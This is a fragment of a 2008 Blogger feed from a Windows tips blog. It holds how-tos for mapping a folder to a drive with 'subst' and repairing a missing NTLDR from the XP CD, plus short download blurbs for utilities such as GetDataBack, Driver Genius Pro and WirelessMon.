url="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMMS2UgLhnI/AAAAAAAAAVo/ojZSsCMQJSU/s72-c/Shots.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-614012602387953097</id><published>2008-09-07T06:59:00.002+08:00</published><updated>2008-09-07T07:20:28.549+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><title type="text">how2.0 : Assign Folder as a Drive</title><content type="html">&lt;div&gt;Had you heard about assigning a folder as a drive? Several user may need a daily used folder as a drive that appear in "my computer". Here it's the trick;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Open up "command prompt" by typing "cmd" at run box&lt;/li&gt;&lt;li&gt;At "command prompt", type; "subst [drive letter] [folder path address]". eg: "subst m: d:\userfolder"&lt;/li&gt;&lt;li&gt;Hit enter and you can see [as an example a new drive: m:\ drive appear in "my computer"&lt;/li&gt;&lt;li&gt;Simple and easy huh? This assigned drive will be deactivate when you reboot your comp.&lt;/li&gt;&lt;li&gt;So, you can make an auto startup program for this assigned drive.&lt;/li&gt;&lt;li&gt;Here come the trick; Simply open up notepad and type this codes : "subst [drive letter] [folder path address]". eg: "subst m: d:\userfolder" and save it as "urfilename".bat.&lt;/li&gt;&lt;li&gt;This is a batch file that runs the command when you double-click it. "urfilename" refer to any name that you want to put. But make sure you keep the file with *.bat extension in order to make it able to be executed.&lt;/li&gt;&lt;li&gt;Then, simply copy this file to the startup folder under "start&gt;all programs&gt;startup"&lt;/li&gt;&lt;li&gt;This means you have just set up that batch file to runs every time the comp rebooted&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-614012602387953097?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/614012602387953097/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-assign-folder-as-drive.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/614012602387953097" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/614012602387953097" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-assign-folder-as-drive.html" title="how2.0 : Assign Folder as a Drive" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-4320220887513394507</id><published>2008-09-06T16:45:00.007+08:00</published><updated>2008-09-06T16:59:34.317+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="recovery" /><category scheme="http://www.blogger.com/atom/ns#" term="utilities" /><category scheme="http://www.blogger.com/atom/ns#" term="recommended" /><title type="text">GetDataBack for NTFS &amp; FAT</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMJELgz3hiI/AAAAAAAAAVg/d2D0mwJJCxo/s1600-h/getdataback.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMJELgz3hiI/AAAAAAAAAVg/d2D0mwJJCxo/s320/getdataback.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5242827880789411362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;GetDataBack recover your data if the hard drive's partition table, boot record, FAT or root directory are lost or damaged, data was lost due to a virus attack, the drive was formatted, fdisk has been run, a power failure has caused a system crash, files were lost due to a software failure, files were accidentally deleted. It recover even when Windows doesn't recognize the drive. A "must have" utilities for all.&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[5.1MB]&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322891"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-4320220887513394507?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/4320220887513394507/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/getdataback-for-ntfs-fat.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4320220887513394507" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4320220887513394507" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/getdataback-for-ntfs-fat.html" title="GetDataBack for NTFS &amp; FAT" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMJELgz3hiI/AAAAAAAAAVg/d2D0mwJJCxo/s72-c/getdataback.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-7137801373600576559</id><published>2008-09-06T16:00:00.003+08:00</published><updated>2008-09-06T16:15:31.870+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="webcam" /><category scheme="http://www.blogger.com/atom/ns#" term="Yahoo Messenger" /><category scheme="http://www.blogger.com/atom/ns#" term="recorder" /><category scheme="http://www.blogger.com/atom/ns#" term="utilities" /><title type="text">oRipa Yahoo Webcam Recorder v1.2</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMI8DoxdnzI/AAAAAAAAAVY/Wj4Hr8fInKk/s1600-h/YahooWebcamRecorder.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMI8DoxdnzI/AAAAAAAAAVY/Wj4Hr8fInKk/s320/YahooWebcamRecorder.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5242818949394833202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;It works with Yahoo Messenger 6.0 and the above versions.&lt;/div&gt;&lt;div&gt;Features :&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Real time record Yahoo webcam with sound recording&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Real time compress your recorded videos &lt;br /&gt;&lt;/li&gt;&lt;li&gt;Save recorded videos into AVI format files&lt;br /&gt;&lt;/li&gt;&lt;li&gt;adjustable FPS and frame size and user defined save-to directory&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[1.7MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322867"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-7137801373600576559?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/7137801373600576559/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/oripa-yahoo-webcam-recorder-v12.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7137801373600576559" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7137801373600576559" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/oripa-yahoo-webcam-recorder-v12.html" title="oRipa Yahoo Webcam Recorder v1.2" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMI8DoxdnzI/AAAAAAAAAVY/Wj4Hr8fInKk/s72-c/YahooWebcamRecorder.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-8420057801449169018</id><published>2008-09-06T15:31:00.004+08:00</published><updated>2008-09-06T15:49:31.685+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="YouTube" /><category scheme="http://www.blogger.com/atom/ns#" term="multimedia" /><category scheme="http://www.blogger.com/atom/ns#" term="media player" /><title type="text">YouTube Video Player v1.0</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMIzOc-BS4I/AAAAAAAAAVQ/HFa8yRx374E/s1600-h/youtube+videoplayer.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMIzOc-BS4I/AAAAAAAAAVQ/HFa8yRx374E/s320/youtube+videoplayer.PNG" border="0" alt="" id="BLOGGER_PHOTO_ID_5242809239600188290" /&gt;&lt;/a&gt;&lt;br /&gt;Unique design. Its seemly alike the video player at YouTube. Make it the default player for your Youtube downloaded videos or any of *.flv videos. With thumbnail view, it make the video player looks very nice and user friendly.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[5MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322859"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-8420057801449169018?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/8420057801449169018/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/youtube-video-player-v10.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/8420057801449169018" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/8420057801449169018" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/youtube-video-player-v10.html" title="YouTube Video Player v1.0" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMIzOc-BS4I/AAAAAAAAAVQ/HFa8yRx374E/s72-c/youtube+videoplayer.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-8639547116456681753</id><published>2008-09-06T03:31:00.006+08:00</published><updated>2008-09-06T03:55:07.234+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="programming" /><category scheme="http://www.blogger.com/atom/ns#" term="utilities" /><category scheme="http://www.blogger.com/atom/ns#" term="portable" /><title type="text">Thinstall Virtualization Suite v3.049</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMGLx2HIkQI/AAAAAAAAAVI/Htg1Gnp_P34/s1600-h/thinstallVS.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMGLx2HIkQI/AAAAAAAAAVI/Htg1Gnp_P34/s320/thinstallVS.PNG" border="0" alt="" id="BLOGGER_PHOTO_ID_5242625129691255042" /&gt;&lt;/a&gt;&lt;br /&gt;Wanna create your own portable application? For sure, this is the right application. With Thinstall VS, you can just simply create a portable application that runs in the flash drive. It seems to be able to provide functionality for everyone from the System Admin with its ability to create MSI files to the average desktop user with the desire for portable applications&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[5.7MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322467"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-8639547116456681753?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/8639547116456681753/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/thinstall-virtualization-suite-v3049.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/8639547116456681753" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/8639547116456681753" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/thinstall-virtualization-suite-v3049.html" title="Thinstall Virtualization Suite v3.049" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_VdjeFVKNi6c/SMGLx2HIkQI/AAAAAAAAAVI/Htg1Gnp_P34/s72-c/thinstallVS.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-663447336117896313</id><published>2008-09-06T03:16:00.004+08:00</published><updated>2008-09-06T03:28:24.610+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="backup" /><category scheme="http://www.blogger.com/atom/ns#" term="utilities" /><category scheme="http://www.blogger.com/atom/ns#" term="driver" /><title type="text">Driver Genius Pro v8.0</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMGGcpDuSNI/AAAAAAAAAVA/OF4qTNrJQ-Y/s1600-h/drivergenius.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMGGcpDuSNI/AAAAAAAAAVA/OF4qTNrJQ-Y/s320/drivergenius.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5242619267851897042" /&gt;&lt;/a&gt;&lt;br /&gt;Driver Genius Professional is a powerful driver manager for Windows that can backup, restore, search and update your drivers automatically in just a several clicks!&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[9.6MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322453"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-663447336117896313?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/663447336117896313/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/driver-genius-pro-v80.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/663447336117896313" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/663447336117896313" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/driver-genius-pro-v80.html" title="Driver Genius Pro v8.0" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMGGcpDuSNI/AAAAAAAAAVA/OF4qTNrJQ-Y/s72-c/drivergenius.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-2251684291549865358</id><published>2008-09-06T03:00:00.005+08:00</published><updated>2008-09-06T03:29:06.485+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="utilities" /><category scheme="http://www.blogger.com/atom/ns#" term="WiFi" /><category scheme="http://www.blogger.com/atom/ns#" term="hack" /><title type="text">WirelessMon v2.0</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMGFOBW5fNI/AAAAAAAAAU4/oHtyNMDfNw4/s1600-h/WirelessMon.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMGFOBW5fNI/AAAAAAAAAU4/oHtyNMDfNw4/s320/WirelessMon.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5242617917165108434" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;WirelessMon 2.0 enables a person to detect and monitor Access Points (AP) on any wireless (WiFi) networks within range. The program provides substantial information regarding each SSID it locates including whether the AP is secure (or not) and its availability for use. A live 'channel usage' chart provides information on the level of traffic for each available channel.&lt;/div&gt;&lt;div&gt; &lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[2MB]&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/322454"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-2251684291549865358?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/2251684291549865358/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/wirelessmon-v20.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/2251684291549865358" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/2251684291549865358" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/wirelessmon-v20.html" title="WirelessMon v2.0" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_VdjeFVKNi6c/SMGFOBW5fNI/AAAAAAAAAU4/oHtyNMDfNw4/s72-c/WirelessMon.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-2837094956277951927</id><published>2008-09-01T20:37:00.005+08:00</published><updated>2008-09-09T11:26:36.596+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="ntldr missing" /><title type="text">how2.0 : Repair Missing NTLDR File Using Windows XP Installation CD</title><content type="html">&lt;a href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SLvidwoRb7I/AAAAAAAAAUw/to0xqob47Ks/s1600-h/ntldr+missing.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5241031592273604530" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SLvidwoRb7I/AAAAAAAAAUw/to0xqob47Ks/s320/ntldr+missing.JPG" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;Had you ever overcome this situation? Most of system damage of file corrupted issues can be fixed using the Windows XP installation CD.&lt;br /&gt;&lt;br /&gt;Just simply follow the above instruction :&lt;br /&gt;&lt;br /&gt;a. Boot your computer from your Windows XP CD.&lt;br /&gt;&lt;br /&gt;b. When a prompt “press any key to boot from the CD….”, simply hit any key.&lt;br /&gt;&lt;br /&gt;c. Once you are in the Windows XP setup menu press the “R” key that’s means to repair the Windows XP system’s file.&lt;br /&gt;&lt;br /&gt;d. Log into your Windows installation By pressing the “1″ &amp;gt;&amp;gt; “enter”, you will now logged into your Windows installation process.&lt;br /&gt;&lt;br /&gt;e. Then, you’ll be asked for your administrator password, enter that password. If there is no password for your administrator account, just leave it blank.&lt;br /&gt;&lt;br /&gt;f. Copy the below two files below using the command line given to the root directory of the primary hard disk [ex : c:/ &amp;lt;&amp;lt;-this is your root directory] from the CD-ROM [ex : f:/ &amp;lt;&amp;lt;-this is your CD-ROM drive letter]. My example above maybe vary to others computer. The command line is ;  • copy f:\i386\ntldr c:\ • copy f:\i386\ntdetect.com c:\  g. The example of completed task is like the screen below :  &lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SLviZsfEP7I/AAAAAAAAAUo/38Edn3ClGgI/s1600-h/ntldr+missing+loaded+file.JPG" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5241031522441772978" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SLviZsfEP7I/AAAAAAAAAUo/38Edn3ClGgI/s320/ntldr+missing+loaded+file.JPG" style="cursor: pointer; display: block; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center;" /&gt;&lt;/a&gt;h. After these files have been successfully copied, just remove the CD from the computer and reboot.&lt;br /&gt;&lt;br /&gt;i. Poof!! Now your Windows XP have been successfully repaired. :)&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;[68KB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/317751"&gt;download how2.0&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-2837094956277951927?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/2837094956277951927/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-repair-missing-ntldr-file-using.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/2837094956277951927" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/2837094956277951927" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-repair-missing-ntldr-file-using.html" title="how2.0 : Repair Missing NTLDR File Using Windows XP Installation CD" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_VdjeFVKNi6c/SLvidwoRb7I/AAAAAAAAAUw/to0xqob47Ks/s72-c/ntldr+missing.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry></feed>
